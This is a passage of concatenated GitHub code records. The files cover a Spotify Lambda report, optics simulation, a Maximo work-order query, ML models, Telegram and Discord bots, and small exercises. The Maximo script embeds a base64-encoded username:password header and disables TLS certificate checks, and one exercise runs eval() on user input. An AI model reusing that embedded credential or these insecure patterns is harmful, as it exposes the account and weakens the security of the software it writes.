{\n 'grant_type': 'client_credentials'\n }\n headers = {\n 'Authorization': f'Basic {client_creds_64.decode()}',\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n res = requests.post('https://accounts.spotify.com/api/token', data=token_data, headers=headers).json()\n return res['access_token']\n \ndef feature_single_song(track):\n features = np.array([[\n track['acousticness'],\n track['danceability'],\n track['energy'],\n track['instrumentalness'],\n track['key'],\n track['liveness'],\n track['loudness'],\n track['mode'],\n track['speechiness'],\n track['tempo'],\n track['valence'],\n ]])\n return np.round(features, decimals=3)\n \n \ndef year_dist(trackids, api_key):\n url = \"https://api.spotify.com/v1/tracks\"\n url_params = {\n \"ids\": trackids.replace(\" \", \"\")\n }\n headers = {\n 'Authorization': 'Bearer %s' % api_key,\n 'Accept': 'applicatioin/json',\n 'Content-Type': 'application/json'\n }\n response = requests.request('GET', url, headers=headers, params=url_params)\n tracks = response.json()[\"tracks\"]\n years = []\n for track in tracks:\n try:\n years.append(int(track[\"album\"][\"release_date\"][:4]))\n except:\n pass\n dist = np.histogram(years, bins=10)\n release = {}\n for i, x in enumerate(dist[0]):\n release[dist[1][i]] = int(x)\n return release\n \ndef get_feature_mtx(trackids, api_key):\n url = \"https://api.spotify.com/v1/audio-features\"\n url_params = {\n \"ids\": trackids.replace(\" \", \"\")\n }\n headers = {\n 'Authorization': 'Bearer %s' % api_key,\n 'Accept': 'applicatioin/json',\n 'Content-Type': 'application/json'\n }\n response = requests.request('GET', url, headers=headers, params=url_params)\n tracks = response.json()[\"audio_features\"]\n feature_mtx = np.concatenate([feature_single_song(track) for track in tracks], axis=0)\n return feature_mtx\n \ndef analyse(trackids):\n api_key = get_token()\n \n feature_mtx = get_feature_mtx(trackids, api_key)\n years = year_dist(trackids, api_key)\n return feature_mtx.mean(0), years\n\n\ndef lambda_handler(event, context):\n headers = {\n \"Access-Control-Allow-Origin\": \"*\",\n \"Access-Control-Allow-Headers\": \"Content-Type,X-Amz-Date,Authorization,X-Api-Key,X-Amz-Security-Token\",\n \"Access-Control-Allow-Methods\": \"GET,OPTIONS,POST,PUT\"\n }\n\n userId = event[\"pathParameters\"][\"userId\"]\n like_tids = get_user_like(userId)\n # print(like_tids)\n if like_tids == \"\":\n return {\n 'statusCode': 404,\n 'headers': headers,\n 'body': json.dumps({\"message\":\"Report: No enough data to generate report because User's like list is empty\"})\n }\n user_feature, years = analyse(like_tids)\n \n results = {\n \"acousticness\":user_feature[0],\n \"danceability\":user_feature[1],\n \"energy\":user_feature[2],\n \"instrumentalness\":user_feature[3],\n \"key\":user_feature[4],\n \"liveness\":user_feature[5],\n \"loudness\":user_feature[6],\n \"mode\":user_feature[7],\n \"speechiness\":user_feature[8],\n \"tempo\": user_feature[9],\n \"valence\":user_feature[10],\n \"release\": years,\n \"message\":\"fetch report data successfully\"\n }\n \n \n return {\n 'statusCode': 200,\n 'headers': headers,\n 'body': json.dumps(results)\n }\n","repo_name":"zipeijiang/Music-Recommend-Lambda","sub_path":"musicReport/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"29651117072","text":"import numpy\n\nfrom rafryshadow3.optical_elements.shadow3_optical_element_decorator import Shadow3OpticalElementDecorator\nfrom rafryshadow3.util.shadow3_util import check_file_name, init_file_name\nfrom syned.beamline.shape import BoundaryShape, Rectangle, Ellipse\nfrom syned.beamline.element_coordinates import ElementCoordinates\n\nfrom Shadow import OE\n\nclass Shadow3Absorber(Shadow3OpticalElementDecorator):\n\n def __init__(self, absorber_parameters):\n Shadow3OpticalElementDecorator.__init__(self, absorber_parameters)\n\n def _build_shadow3_oe(self, additional_parameters):\n shadow3_oe=OE()\n\n shadow3_oe.DUMMY=100\n\n shadow3_oe.FMIRR=5\n shadow3_oe.F_CRYSTAL=0\n shadow3_oe.F_REFRAC=2\n shadow3_oe.F_SCREEN=1\n shadow3_oe.N_SCREEN=1\n\n i_screen = numpy.zeros(10) # after\n i_abs = numpy.zeros(10)\n i_slit = numpy.zeros(10)\n i_stop = numpy.zeros(10)\n k_slit = numpy.zeros(10)\n thick = numpy.zeros(10)\n file_abs = ['', '', '', '', '', '', '', '', '', '']\n rx_slit = numpy.zeros(10)\n rz_slit = numpy.zeros(10)\n sl_dis = numpy.zeros(10)\n file_scr_ext = ['', '', '', '', '', '', '', '', '', '']\n cx_slit = numpy.zeros(10)\n cz_slit = numpy.zeros(10)\n\n i_abs[0] = additional_parameters.I_ABS\n i_slit[0] = additional_parameters.I_SLIT\n\n if additional_parameters.I_SLIT == 1:\n i_stop[0] = additional_parameters.I_STOP\n\n if self._boundary_shape is None:\n k_slit[0] = 2\n file_scr_ext[0] = check_file_name(additional_parameters.FILE_SCR_EXT)\n else:\n if isinstance(self._boundary_shape, Rectangle):\n k_slit[0] = 0\n elif isinstance(self._boundary_shape, Ellipse):\n k_slit[0] = 1\n\n x_min, x_max, z_min, z_max = self._boundary_shape.get_boundaries()\n\n rx_slit[0] = abs(x_max - x_min)\n rz_slit[0] = abs(z_max - z_min)\n cx_slit[0] = 0.5*(x_max + x_min)\n cz_slit[0] = 0.5*(z_max + z_min)\n\n if additional_parameters.I_ABS == 1:\n thick[0] = additional_parameters.THICK\n file_abs[0] = check_file_name(additional_parameters.FILE_ABS)\n\n shadow3_oe.set_screens(1,\n i_screen,\n i_abs,\n sl_dis,\n i_slit,\n i_stop,\n k_slit,\n thick,\n numpy.array(file_abs),\n rx_slit,\n rz_slit,\n cx_slit,\n cz_slit,\n numpy.array(file_scr_ext))\n\n return shadow3_oe\n\n def _set_coordinates(self, element_coordinates=ElementCoordinates()):\n self._shadow3_oe.T_SOURCE = element_coordinates.p()\n self._shadow3_oe.T_IMAGE = element_coordinates.q()\n self._shadow3_oe.T_INCIDENCE = 0.0\n self._shadow3_oe.T_REFLECTION = 180.0\n self._shadow3_oe.ALPHA = 0.0","repo_name":"oasys-kit/rafryshadow3","sub_path":"rafryshadow3/optical_elements/absorbers/shadow3_absorber.py","file_name":"shadow3_absorber.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29314275439","text":"import requests\r\nimport json\r\nimport csv\r\nimport os\r\nimport shutil\r\nfrom pprint import pprint\r\n\r\n#work order to test it 15706973\r\nworkordernum = input(\"Enter a workorder:\")\r\n\r\n# connects to maximo server to make api calls\r\napi_url = \"http://ocudrhmxdvap01/maxrest/rest/os/mxwo?\"\r\n\r\n# Build query URL\r\nquery_url = f\"{api_url}wonum={workordernum}\"\r\n# setting the headers for the request to be made.\r\nheaders = {\r\n 'Content-Type': \"application/json\",\r\n # the authoization is username:password in base64\r\n # use https://www.base64encode.org/ to format the username and password to base64\r\n 'MAXAUTH': \"MTM2MDQ4Om1heGltbw==\",\r\n 'cache-control': \"no-cache\"\r\n}\r\n\r\n# Set the query parameters for the API request.\r\nparams = {\r\n '_format': 'json',\r\n 'compact': 1,\r\n 'workorder': '~sw~%s' % workordernum\r\n}\r\n\r\n# Make API request\r\ntry:\r\n response = requests.get(query_url, headers=headers, params=params, verify=False)\r\n #print(response.json)\r\nexcept requests.exceptions.RequestException as e:\r\n # An error occurred while making the request\r\n print(f\"An error occurred while making the request: {e}\")\r\n ourdata = []\r\nelse:\r\n # Check the status code of the response\r\n if response.status_code != 200:\r\n # The request failed\r\n print(f\"The request failed with status code {response.status_code}\")\r\n ourdata = []\r\n else:\r\n # Parse response\r\n try:\r\n data = response.json()\r\n #pprint(data)\r\n ourdata = ((item[\"Attributes\"][\"workorder\"][\"content\"], item[\"Attributes\"][\"DESCRIPTION\"][\"content\"]) for item in data['QueryMXWOResponse'][\"MXWOSet\"][\"WORKORDER\"])\r\n print(ourdata)\r\n except json.decoder.JSONDecodeError as e:\r\n # An error occurred while parsing the response\r\n print(f\"An error occurred while parsing the response: {e}\")\r\n ourdata = []\r\n\r\n\r\n# Set the header row for the CSV file\r\ncsvheader = ['Attributes', 'WORKORDER', 'content']\r\n\r\n# Define the path for the CSV file\r\npath = 'C:/Users/136048/Desktop/dev/%s_workorder.csv' % workordernum\r\n\r\n\r\n# Define the destination for the copied file\r\n# Path can be changed to a different destination just incase dev folder is corrupted.\r\ncopy_name = 'C:/Users/136048/Desktop/dev/%s_workorder.csv' % workordernum\r\n\r\n# Check if the path exists\r\nif os.path.exists(path):\r\n # Copy the CSV file to a new location\r\n shutil.copy(path, copy_name)\r\nelse:\r\n print(\"The file does not exist at the specified path.\")\r\n\r\n# Open a CSV file for writing\r\nwith open(path, 'w', encoding='UTF8', newline='') as file:\r\n writer = csv.writer(file)\r\n writer.writerow(csvheader) #writes the csv headers such as ['Attributes', 'LOCATION', 'content']\r\n writer.writerows(ourdata) # writes the data that is beig extracted from the json file.\r\n\r\n# Close the CSV file to make sure file doesn't get corrupted or get extra values inputted.\r\nfile.close()\r\n\r\n# Copy the CSV file to a new location\r\ncopy_name = path\r\nif os.path.exists(path):\r\n shutil.copy(path, copy_name)\r\n\r\nprint(f\"Successfully wrote {len(ourdata)} work orders to 'workorders.csv'.\")\r\n\r\n","repo_name":"LuckyStraight/Maximo-API-and-Query","sub_path":"workorderQuery.py","file_name":"workorderQuery.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72223283561","text":"import torch\nfrom torch import nn\nfrom PhysNet.PhysNet_Layer import physnet\nfrom Denoise_Graph import denoise_graph\nfrom HR_Cal import hr_cal\n\n\nclass Model_PhysNet(nn.Module):\n\n def __init__(self):\n super().__init__()\n self.opt = OptInit()\n self.model_physnet = physnet()\n self.model_wave_graph = denoise_graph(self.opt)\n self.model_hr_cal = hr_cal(self.opt)\n\n # Initialize weights\n self.init_weights()\n\n @torch.no_grad()\n def init_weights(self):\n def _init(m):\n if isinstance(m, nn.Linear):\n nn.init.xavier_uniform_(m.weight)\n if hasattr(m, 'bias') and m.bias is not None:\n nn.init.normal_(m.bias, std=1e-6) # nn.init.constant(m.bias, 0)\n\n self.apply(_init)\n\n def forward(self, x): # [B, 3, 160, 128, 128]\n wave = self.model_physnet(x) # [B, 3, 160, 8, 8]\n ecg = self.model_wave_graph(wave)\n\n hr, hr_class = self.model_hr_cal(ecg)\n return ecg, hr, hr_class\n\n def __str__(self):\n str = self.opt.__str__() + \"\\n\"\n str = str + self.model_physnet.__str__() + \"\\n\"\n str = str + self.model_wave_graph.__str__() + \"\\n\"\n str = str + self.model_hr_cal.__str__() + \"\\n\"\n return str\n\n def save_model(self, log):\n torch.save(self.state_dict(), log + '/' + 'model_hr_best.pkl')\n torch.save(self.model_physnet.state_dict(), log + '/' + 'model_physnet.pkl')\n torch.save(self.model_wave_graph.state_dict(), log + '/' + 'model_wave_graph_best.pkl')\n torch.save(self.model_hr_cal.state_dict(), log + '/' + 'model_hr_cal_best.pkl')\n\n\nclass OptInit:\n def __init__(self):\n # Wave Graph\n self.wave_gnn_k = 18 # neighbor num (default:18)\n self.wave_gnn_conv = 'avg_relative_conv' # graph conv layer {edge, sage, gin, mr, avg_relative_conv}\n self.wave_gnn_act = 'gelu' # activation layer {relu, prelu, leakyrelu, gelu, hswish}\n self.wave_gnn_norm = 'batch' # batch or instance normalization {batch, instance}\n self.wave_gnn_bias = True # bias of conv layer True or False\n self.wave_gnn_epsilon = 0.2 # stochastic epsilon for gcn\n self.wave_gnn_use_stochastic = False # stochastic for gcn, True or False\n self.wave_gnn_drop_path = 0.0\n self.wave_gnn_blocks = [1, 1] # number of basic blocks in the backbone\n self.wave_last_dim = 4096\n self.wave_channels = [768, 192, 96, 24, 1] # number of channels of deep features\n\n # HRcal\n self.hr_cal_class_channle = [160, 280]\n self.hr_cal_class_act = 'gelu'\n self.hr_cal_class_dropout_rate = [0.25]\n self.hr_cal_out_class = 140\n\n def __str__(self):\n attrs = vars(self)\n return ', '.join(\"%s: %s\" % item for item in attrs.items())\n","repo_name":"Xiong-JiaHao/GraphPhys","sub_path":"Model_PhysNet.py","file_name":"Model_PhysNet.py","file_ext":"py","file_size_in_byte":2829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"8950717031","text":"dict = {'@' : ' * 3', '%' : ' + 5', '#' : ' - 7' }\nT = int(input())\nfor i in range(T):\n string = ''\n answer = 0\n for char in input().split():\n if (char == '@') or (char == '%') or (char == '#'):\n answer = eval(string + dict[char])\n else:\n answer = eval(string + char)\n string = str(answer)\n print(\"%.2f\"%(answer))\n","repo_name":"dlwnsgud8406/mysolved","sub_path":"baekjoon/bronze2/5355.py","file_name":"5355.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5746679627","text":"\"\"\"\nThe parsers agent provides an interface for the server to construct messages to can be sent to the parsers over the MQ.\nIt should provide only `construct_parsers_message` as its interface.\n\"\"\"\n\nimport numpy as np\n\nfrom brain import data_path\nfrom brain.autogen import server_parsers_pb2, client_server_pb2\nfrom brain.utils.common import normalize_path, get_logger\n\nlogger = get_logger(__name__)\n\n\ndef copy_protobuf(item_a, item_b, attrs):\n for attr in attrs:\n setattr(item_a, attr, getattr(item_b, attr))\n\n\ndef handle_color_image(snapshot, data):\n # save color image blob as raw file to disk\n path = normalize_path(snapshot.path)\n image_file = str(path / 'color_image.raw')\n with open(image_file, 'wb') as writer:\n writer.write(data)\n snapshot.color_image.file_name = image_file\n\n\ndef handle_depth_image(snapshot, data):\n # save depth image blob as raw file to disk\n path = normalize_path(snapshot.path)\n image_file = 'depth_image.raw'\n image_file_path = str(path / image_file)\n array = np.array(data).astype(np.float)\n np.save(image_file_path, array)\n snapshot.depth_image.file_name = image_file + '.npy'\n\n\ndef construct_parsers_message(snapshot: client_server_pb2.Snapshot, snapshot_uuid: int) -> server_parsers_pb2.Snapshot:\n \"\"\"\n Construct a message to the parsers.\n\n The main change being done at this point, is to save blobs such as color and depth image to the disk,\n and provide a path to the file on disk instead of the actual data being stored as part of the message so far.\n\n :param snapshot: snapshot in client_server_pb2.Snapshot format.\n :param snapshot_uuid: uuid of the snapshot.\n :return: the constructed message in server_parsers_pb2.Snapshot format.\n \"\"\"\n\n logger.debug(f'constructing message for parsers')\n parsers_snapshot = server_parsers_pb2.Snapshot()\n parsers_snapshot.uuid = snapshot_uuid\n copy_protobuf(parsers_snapshot, snapshot, ['datetime'])\n copy_protobuf(parsers_snapshot.user, snapshot.user, ['user_id', 'username', 'birthday', 'gender'])\n copy_protobuf(parsers_snapshot.pose.translation, snapshot.pose.translation, ['x', 'y', 'z'])\n copy_protobuf(parsers_snapshot.pose.rotation, snapshot.pose.rotation, ['x', 'y', 'z', 'w'])\n copy_protobuf(parsers_snapshot.color_image, snapshot.color_image, ['width', 'height'])\n copy_protobuf(parsers_snapshot.depth_image, snapshot.depth_image, ['width', 'height'])\n copy_protobuf(parsers_snapshot.feelings, snapshot.feelings, ['hunger', 'thirst', 'exhaustion', 'happiness'])\n\n # before saving blobs to the disk, we must find a directory to saves file to.\n # we will use the /// directory (and create it if not exists).\n base_path = data_path\n user_id = parsers_snapshot.user.user_id\n user_dir = base_path / str(user_id)\n if not user_dir.exists():\n user_dir.mkdir()\n snapshot_dir = user_dir / str(parsers_snapshot.uuid)\n if not snapshot_dir.exists():\n snapshot_dir.mkdir()\n\n # provide base path as part of the message, and certain results will contains file name.\n parsers_snapshot.path = str(snapshot_dir)\n\n if parsers_snapshot.color_image:\n handle_color_image(parsers_snapshot, snapshot.color_image.data)\n if parsers_snapshot.depth_image:\n handle_depth_image(parsers_snapshot, snapshot.depth_image.data)\n return parsers_snapshot\n","repo_name":"ntalmon/brain","sub_path":"brain/server/parsers_agent.py","file_name":"parsers_agent.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12162749194","text":"from maya.api import OpenMaya\nfrom maya import cmds\n\nfrom caffeine.logs import getActionLogger\nfrom caffeine import steps\n\n\nLOG = getActionLogger('createJoint')\n\n\ndef build(ctx):\n obj = OpenMaya.MFnDependencyNode().create('joint', name=ctx['name'])\n\n return steps.StepResponse.fromDict({\n 'status': 200,\n 'node': obj,\n 'name': OpenMaya.MFnDependencyNode(obj).name()\n })\n\n\ndef save(ctx, response):\n n = response['node']\n nodeName = OpenMaya.MFnDagNode(n).fullPathName()\n ctx['name'] = nodeName.split('|')[-1]\n \n pos = cmds.xform(nodeName, q=True, ws=True, t=True)\n ctx['position'] = pos\n\n rot = cmds.xform(nodeName, q=True, ws=True, ro=True)\n ctx['orient'] = rot\n\n ctx['ssc'] = cmds.getAttr('{0}.ssc'.format(nodeName))\n ","repo_name":"ricksilliker/caffeine","sub_path":"src/caffeine_maya/defaultSteps/createJoint.step/builder.py","file_name":"builder.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26598381500","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\ntesty\r\n\"\"\"\r\n\r\nfrom nghh import *\r\nimport unittest\r\n\r\n\r\nclass MyTestCase(unittest.TestCase):\r\n def test_1(self):\r\n m = \"abc\"\r\n our = SHA_512_256(m)\r\n \r\n official = 0x53048E2681941EF99B2E29B76B4C7DABE4C2D0C634FC6D46E0E2F13107E7AF23\r\n self.assertEqual(our, official)\r\n self.assertEqual(hex(our), hex(official))\r\n \r\n def test_2(self):\r\n m = \"abcdefghbcdefghicdefghijdefghijkefghijklfghijklmghijklmnhijklmnoijklmnopjklmnopqklmnopqrlmnopqrsmnopqrstnopqrstu\"\r\n our = SHA_512_256(m)\r\n official = 0x3928E184FB8690F840DA3988121D31BE65CB9D3EF83EE6146FEAC861E19B563A\r\n self.assertEqual(our, official)\r\n self.assertEqual(hex(our), hex(official))\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n unittest.main()\r\n","repo_name":"Heightweight/crypto_project","sub_path":"signature/testy.py","file_name":"testy.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74399909161","text":"class Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if len(prices) <= 1:\n return 0\n \n buy = prices[0]\n profit = 0\n prices = prices[1:]\n for sell in prices:\n if buy > sell:\n buy = sell\n elif sell - buy > profit:\n profit = sell - buy\n \n \n return profit\n","repo_name":"Ashrockzzz2003/LeetCode_Solutions","sub_path":"121.py","file_name":"121.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"42971061025","text":"import vsketch\n\nimport math\n\nimport numpy as np\nfrom shapely.geometry import *\nfrom shapely.affinity import *\nfrom shapely.ops import *\n\n\nclass S008Sketch(vsketch.SketchClass):\n dual = vsketch.Param(True)\n\n def flow(self, freq: float, thick: float, rounding: float) -> MultiLineString:\n vsk = self.vsk\n\n ampl = vsk.random(0.1, 0.3)\n\n counts = {}\n lines = []\n for y0 in np.arange(0, 18, thick):\n for x0 in np.arange(0, 15, thick):\n line = [(x0, y0)]\n for _ in range(100):\n x, y = line[-1]\n xt, yt = x / 15, y / 18\n a = vsk.noise(xt * freq, yt * freq) * math.tau\n a = math.radians(math.degrees(a) // rounding * rounding)\n x += math.cos(a) * ampl\n y += math.sin(a) * ampl\n\n k = int(round(x * 10)), int(round(y * 10))\n c = counts.get(k, 0)\n if c < 2:\n counts[k] = c + 1\n else:\n break\n\n if 0 <= x <= 15 and 0 <= y <= 18:\n line.append((x, y))\n else:\n break\n\n if len(line) > 1:\n lines.append(line)\n\n return MultiLineString(lines)\n\n def draw(self, vsk: vsketch.Vsketch) -> None:\n vsk.size(\"a5\", landscape=False)\n vsk.scale(\"cm\")\n\n freq = vsk.random(7, 10)\n rounding = int(vsk.random(1, 9) * 10)\n\n lines1 = self.flow(freq, 0.80, rounding)\n lines2 = self.flow(freq, 0.25, rounding)\n\n subject = Point(6.5, 9).buffer(5)\n\n if self.dual:\n container = box(0, 0, 13, 18)\n\n t = vsk.random(0.2, 0.8)\n container_left = Polygon(\n [(0, 0), (vsk.lerp(0, 13, t), 0), (vsk.lerp(0, 13, 1 - t), 18), (0, 18)]\n )\n container_right = Polygon(\n [\n (vsk.lerp(0, 13, t), 0),\n (13, 0),\n (13, 18),\n (vsk.lerp(0, 13, 1 - t), 18),\n ]\n )\n\n vsk.geometry(container)\n\n lines = [\n (lines1 & container, container_left, True),\n (lines2 & container, container_left, False),\n (lines1 & container, container_right, False),\n (lines2 & container, container_right, True),\n ]\n\n for lc, cont, subj_shading in lines:\n for l in lc.geoms:\n ll = []\n for x, y in l.coords:\n if vsk.random(1) > 0.3 and (\n not cont.contains(Point(x, y))\n or subj_shading != subject.contains(Point(x, y))\n ):\n if ll:\n vsk.polygon(ll)\n ll.clear()\n continue\n ll.append((x, y))\n if ll:\n vsk.polygon(ll)\n else:\n container = box(0, 0, 13, 18)\n vsk.geometry(container)\n vsk.geometry((lines1 - subject) & container)\n\n vsk.geometry((lines2 & subject) & container)\n\n def finalize(self, vsk: vsketch.Vsketch) -> None:\n vsk.vpype(\"color black linemerge linesimplify reloop linesort\")\n\n\nif __name__ == \"__main__\":\n S008Sketch.display()\n","repo_name":"d-dorazio/pus","sub_path":"s008/sketch_s008.py","file_name":"sketch_s008.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"6425953046","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n#import math\nimport math\n\n#initiate valuable\ndegreeList = []\nsinList = []\ncosList = []\nsin = 0\ncos = 0\n\n#create lists of degree, sin, and cos\nfor i in range(0, 37):\n degreeList.append(i * 10)\n \n sin = math.sin(math.radians(degreeList[i]))\n sinList.append(round(sin, 4))\n \n cos = math.cos(math.radians(degreeList[i]))\n cosList.append(round(cos, 4))\n\n#define function to print degree, sin, and cos\ndef desplay(degree, sin, cos):\n print(format(degree, \"<10.4f\"), format(sin, \"<10.4f\"), format(cos, \"<10.4f\"))\n\n#print columns name\nprint(format(\"Degree\", \"<10s\"), format(\"Sin\", \"<10s\"), format(\"Cos\", \"<10s\"), \"\\n\")\n\n#print degrees, sins, and coses\nfor i in range(0, 37):\n desplay(degreeList[i], sinList[i], cosList[i])\n ","repo_name":"ShinsakuOkazaki/PythonPractice","sub_path":"assign5.7.py","file_name":"assign5.7.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14753291901","text":"from functions import get_difference_percent\nfrom volatility.volatility_telegram_sender import send_telegram_message\n\ncoins = []\n\n\ndef set_coins(new_coins):\n global coins\n coins = new_coins\n\n\ndef get_coins():\n return coins\n\n\ndef check_changes(new_coins):\n if len(get_coins()):\n for new_coin in new_coins:\n for coin in get_coins():\n if coin['symbol'] == new_coin['symbol']:\n price_change_percent = get_difference_percent(coin['price'], new_coin['price'])\n if abs(price_change_percent) > 5:\n send_telegram_message(new_coin, price_change_percent)\n\n set_coins(new_coins)\n","repo_name":"elfarych/bitman-trader","sub_path":"Python-screener/volatility/volatility.py","file_name":"volatility.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27838008823","text":"\nimport asyncio\nimport pyrogram\nfrom pyrogram import Client, filters\nfrom driver.filters import command\nfrom pyrogram.types import Message\nfrom pyrogram.types import Message, InlineKeyboardMarkup, InlineKeyboardButton\nfrom config import (\n BOT_NAME,\n BOT_PHOTO,\n)\n\n\n\n@Client.on_message(filters.command(BOT_NAME))\ndef reply_to_timo(Client, message):\n message.reply_text(\n f\"\"\"**╪з┘К ┘В┘Д╪и┘К ЁЯдНЁЯШ╗**\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\"Tсе▒сегсе▒ъкФсе▒ъкО MсеЩсеЙсОесе┤\", url=f\"https://t.me/source_telemex\"),\n ]\n ]\n )\n )\n \n \n \n@Client.on_message(command([\"╪и┘И╪к\", \"┘И╪к\"]) & ~filters.edited)\nasync def nammes(client: Client, message: Message):\n usr = await client.get_users(message.from_user.id)\n name = usr.first_name\n await message.reply_photo(\n photo=f\"{BOT_PHOTO}\",\n caption=f\"\"\"╪з╪│┘Е┘К {BOT_NAME} ╪з┘Д┘Г┘К┘И╪к ЁЯМЭтЩея╕П\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(\n name, url=f\"https://t.me/{message.from_user.username}\")\n ],\n [\n InlineKeyboardButton(\"╪з╪╡┘Ж╪╣ ╪и┘И╪к┘Г\", url=f\"https://t.me/source_Telemex\"),\n ], \n ]\n ),\n )\n \n\n \n","repo_name":"Music-euro/TELEMEX_MUSIC","sub_path":"program/namebot.py","file_name":"namebot.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73442525481","text":"\"\"\"\nThis script predicts recommendations using a turicreate model.\n\"\"\"\n\nimport pandas as pd\nimport turicreate as tc\n\n# utility function to load the model\ndef load_model(model_dir):\n model = tc.load_model(model_dir)\n return model\n\n# Loading the model\nmodel = load_model('movie_recs.model')\n\n# Defining a new user with their ratings\ndef create_new_user_ratings(movieIds: list, ratings: list, userIds: list):\n new_user_ratings = tc.SFrame({\n 'movieId': movieIds,\n 'rating': ratings,\n 'userId': userIds\n })\n return new_user_ratings\n\n# Creating a new user with their ratings\nnew_user_ratings = create_new_user_ratings(\n movieIds=[1073, 919, 1097], \n ratings=[5, 5, 5], \n userIds=[5000000, 5000000, 5000000]\n)\n\n# Making recommendations\nrecommendations = model.recommend([5000000], new_observation_data=new_user_ratings)\n\n# Converting the recommendations to a list\nlist_of_recommandations = list(recommendations['movieId'])\n\n# A function to convert the list of recommendations to their corresponding titles\ndef convertRecommendationsToTitle(list_of_recommandations):\n df = pd.read_csv('../input/movie.csv')\n df = df[['movieId', 'title', 'genres']]\n df = df.set_index('movieId')\n df = df.loc[list_of_recommandations]\n return df\n\n# Converting the recommendations to their corresponding titles\ndf = convertRecommendationsToTitle(list_of_recommandations)\n\n# Printing the top 10 recommendation's titles\nprint(df.head(10))","repo_name":"aryankhatana01/cf-recsys","sub_path":"turimodel/predictRecommendations.py","file_name":"predictRecommendations.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"13621076375","text":"class BinaryTree:\n\n def __init__(self, root_node = None):\n # Check out Use Me section to find out Node Structure\n self.root = root_node\n\n def insert(self, root, data):\n # Return the new root\n root = self._insert(root, data)\n return root\n\n def _insert(self, curr, data):\n if not curr:\n return TreeNode(data, None, None)\n else:\n if data < curr.data:\n curr.left_child = self._insert(curr.left_child, data)\n elif data > curr.data:\n curr.right_child = self._insert(curr.right_child, data)\n return curr\n","repo_name":"richnakasato/fc","sub_path":"jam_into_a_bst.py","file_name":"jam_into_a_bst.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11507446438","text":"import cv2\nimport numpy as np\nfrom multiprocessing import Pool, cpu_count\n\ndef apply_gaussian_blur_chunk(chunk, kernel_size):\n # Apply Gaussian blur to a chunk of the image\n chunk_blurred = cv2.GaussianBlur(chunk, (kernel_size, kernel_size), 0)\n return chunk_blurred\n\ndef apply_gaussian_blur(image_path, output_path, chunk_size=100, kernel_size=5):\n # Load the image\n image = cv2.imread(image_path)\n if image is None:\n print(\"Error: Unable to load the image.\")\n return\n\n # Ensure the kernel size is valid and odd\n if kernel_size % 2 == 0:\n kernel_size += 1\n \n # Split the image into smaller chunks\n rows, cols = image.shape[:2]\n chunks = [image[row:row + chunk_size, col:col + chunk_size]\n for row in range(0, rows, chunk_size)\n for col in range(0, cols, chunk_size)]\n\n # Apply Gaussian blur using multiprocessing\n num_processes = cpu_count()\n with Pool(num_processes) as pool:\n chunk_blurred_list = pool.starmap(apply_gaussian_blur_chunk,\n [(chunk, kernel_size) for chunk in chunks])\n\n # Recombine the blurred chunks into the final image\n output_image = np.zeros_like(image)\n current_chunk = 0\n for row in range(0, rows, chunk_size):\n for col in range(0, cols, chunk_size):\n output_image[row:row + chunk_size, col:col + chunk_size] = chunk_blurred_list[current_chunk]\n current_chunk += 1\n\n # Save the final image with Gaussian blur applied\n cv2.imwrite(output_path, output_image)\n print(\"Gaussian blur applied and saved successfully.\")\n\ndef gaussian_main(filepath):\n input_image_path = filepath\n output_image_path = \"gaussian_blurred_image.jpg\"\n \n kernel_size = int(input(\"Enter kernel size for Gaussian blur: \"))\n apply_gaussian_blur(input_image_path, output_image_path, kernel_size=kernel_size)\n","repo_name":"YKhanna2003/Algorithms_On_Satellite_Imagery","sub_path":"Filter_Support/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":1903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"1066329726","text":"import discord\nfrom discord.ext import commands\n\nfrom cogs.consts import *\nfrom cogs.handlers import Handlers, Failed\nfrom cogs import interactions\n\n\nclass Reset(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.emojis = Emojis\n self.colours = 